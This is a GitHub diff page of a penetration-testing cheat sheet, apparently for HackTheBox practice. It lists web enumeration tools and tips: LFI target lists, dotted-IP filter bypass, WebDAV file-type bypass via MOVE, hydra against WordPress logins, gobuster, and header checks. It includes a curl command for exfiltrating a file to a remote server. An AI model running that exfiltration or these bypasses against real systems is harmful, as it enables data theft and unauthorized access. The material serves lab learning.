You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Common and/or useful files to check for when exploiting Local File Inclusion \(for both Linux and Windows\): [https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI](https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI)
Injecting IPs when `.` is disallowed: convert dotted-decimal format to decimal value - [`ip2dh`](https://github.com/4ndr34z/MyScripts/blob/master/ip2dh.py)
121
-
122
-
Use `curl` to exfiltrate file on remote server \(from attackers box\): `curl -d @/<file> <remote server>`
123
-
124
-
in order to proxy tools that have no proxy option: create burn proxy 127.0.0.1:80 [Ippsec:HacktheBox - Granny & Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ)
125
-
126
-
vulnerability testing for webdav \(or other file upload vulns!\): `davtest`
127
-
128
-
bypassing filetype filters with http MOVE command to rename allowed filetype [Ippsec:HacktheBox - Granny & Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ)
pull Google cached webpage if regular site not loading: `cache:https://<somewebsite>`
133
-
134
-
Virtual Host Routing: substitute IP for hostname to get different results
135
-
136
-
### gobuster
137
-
138
-
```bash
139
-
gobuster -u $url -w $wordlist -l -x php -t 20
140
-
[-l include length, -x append .php to searches, -t threads]
141
-
```
142
-
143
-
hydra against http wordpress login walkthrough: [IppSec:HacktheBox - Apocalyst](https://www.youtube.com/watch?v=TJVghYBByIA)
144
-
145
-
web application fuzzer: [wfuzz](https://github.com/xmendez/wfuzz)
146
-
147
-
Web site "flyover" surveillance: [Aquatone](https://github.com/michenriksen/aquatone) "is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface" - from the author \(see link\). Visual dirbuster?
148
-
149
-
### Crawl web pages for keywords - useful for password/vhost enumeration lists
Injecting IPs when `.` is disallowed: convert dotted-decimal format to decimal value - [`ip2dh`](https://github.com/4ndr34z/MyScripts/blob/master/ip2dh.py)
293
+
294
+
Use `curl` to exfiltrate file on remote server \(from attackers box\): `curl -d @/<file> <remote server>`
295
+
296
+
in order to proxy tools that have no proxy option: create burn proxy 127.0.0.1:80 [Ippsec:HacktheBox - Granny & Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ)
297
+
298
+
vulnerability testing for webdav \(or other file upload vulns!\): `davtest`
299
+
300
+
bypassing filetype filters with http MOVE command to rename allowed filetype [Ippsec:HacktheBox - Granny & Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ)
pull Google cached webpage if regular site not loading: `cache:https://<somewebsite>`
305
+
306
+
Virtual Host Routing: substitute IP for hostname to get different results
307
+
308
+
### gobuster
309
+
310
+
```bash
311
+
gobuster -u $url -w $wordlist -l -x php -t 20
312
+
[-l include length, -x append .php to searches, -t threads]
313
+
```
314
+
315
+
hydra against http wordpress login walkthrough: [IppSec:HacktheBox - Apocalyst](https://www.youtube.com/watch?v=TJVghYBByIA)
316
+
317
+
web application fuzzer: [wfuzz](https://github.com/xmendez/wfuzz)
318
+
319
+
Web site "flyover" surveillance: [Aquatone](https://github.com/michenriksen/aquatone) "is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface" - from the author \(see link\). Visual dirbuster?
320
+
321
+
### Crawl web pages for keywords - useful for password/vhost enumeration lists
322
+
323
+
```bash
324
+
cewl
325
+
```
326
+
327
+
### Common checks
328
+
329
+
```bash
330
+
# robots.txt
331
+
curl http://example.com/robots.txt
332
+
333
+
# headers
334
+
wget --save-headers http://www.example.com/
335
+
# Strict-Transport-Security (HSTS)
336
+
# X-Frame-Options: SAMEORIGIN
337
+
# X-XSS-Protection: 1; mode=block
338
+
# X-Content-Type-Options: nosniff
339
+
340
+
# Cookies
341
+
# Check Secure and HttpOnly flag in session cookie
342
+
# If exists BIG-IP cookie, app behind a load balancer
0 commit comments